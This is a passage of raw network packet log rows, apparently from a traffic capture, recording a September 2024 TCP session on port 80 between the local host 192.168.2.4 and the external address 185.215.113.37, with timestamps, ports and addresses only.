Sep 30, 2024 07:08:01.972703934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972714901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972724915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972735882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972747087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972747087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972774029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972776890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972785950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972795963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972805023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972812891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972824097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972840071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972856998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972867012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972882986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972899914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972937107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972948074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972956896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972968102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972978115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.972985983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.972995996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.973001957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.973006964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.973032951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.973045111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:02.638710976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:02.638761997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:02.643629074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:02.643649101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:02.643671036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:02.643681049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:02.643707991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:03.500562906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:03.500674009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:03.575006962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:03.575052023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:03.579834938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:03.579845905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:03.579921961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:04.425265074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:04.425373077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:04.452943087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:04.457812071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:05.190960884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:05.191056967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:05.521486998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:05.526483059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.245879889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.246083975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.442893982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.447875023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664453983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664474010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664490938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664505959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664520979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664536953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664551020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664566040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664580107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664589882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.664594889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664608955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664623976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664642096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664659023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.664659023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.664688110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.664712906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.793874979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.793890953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.793908119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.793930054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.793941021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.793945074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.793967962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794003010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794013023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794015884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794032097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794048071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794060946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794087887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794094086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794104099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794110060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794120073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794130087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794147968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794168949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794198990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794222116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794236898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794245958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794254065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794267893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794270039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794284105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794292927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794302940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794315100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794323921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794331074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794347048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794349909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794359922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794375896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794382095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794392109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794405937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.794406891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794437885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.794456005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923137903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923163891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923178911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923192024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923207045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923228979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923243999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923258066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923273087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923286915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923290014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923302889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923316956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923326969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923338890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923366070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923398972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923399925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923415899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923429966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923449993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923456907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923472881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923485994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923486948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923507929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923511028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923521996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923537970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923559904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923567057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923577070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923592091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923608065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923621893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923641920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923670053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923675060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923691034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923706055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923721075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923741102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923751116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923758030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923768044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923794985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923795938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923810959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923821926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923826933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923841000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923842907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923860073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923885107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923913956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923928976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923943043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923957109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923962116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.923989058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.923995972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924004078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924021959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924026012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924041986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924057007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924077988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924079895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924092054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924104929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924114943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924132109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924138069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924143076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924154043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924163103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924169064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924206018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924217939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924228907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924232960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:06.924263000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:06.924290895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052273989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052297115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052310944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052323103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052331924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052339077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052359104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052370071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052371979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052371979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052378893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052386999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052393913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052409887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052416086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052416086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052424908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052443027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052453995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052459955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052474022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052474022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052484035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052490950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052498102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052511930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052525043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052544117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052551031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052586079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052787066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052858114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052887917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052901983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052916050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052930117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052931070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052944899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052946091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052963018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052970886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.052982092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.052987099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053003073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053014994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053023100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053039074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053040981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053056002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053069115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053069115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053097010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053121090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053128004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053142071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053155899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053169966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053169966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053181887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053188086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053199053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053215981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053216934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053231955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053231955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053248882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053258896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053262949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053273916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053289890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053306103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053309917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053324938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053339958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053349018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053356886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053366899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053381920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053400040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053409100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053422928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053436995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053450108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053452015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053467035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053467989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053483963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053502083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053515911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053528070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053541899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053555965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053564072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053570986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053584099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053586960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053601027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053620100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053623915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053637028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053642035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053658009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053663969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053679943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053698063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053747892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053762913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053780079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053793907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053793907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053811073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053812027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053826094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053831100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053858995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053863049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053879023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053890944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053903103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053906918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053922892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053932905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053939104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053966045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053973913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.053982973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.053997040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054023027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054039955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:07.054089069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054102898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054116964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:07.054128885 CEST	80	49730	185.215.113.37	192.168.2.4
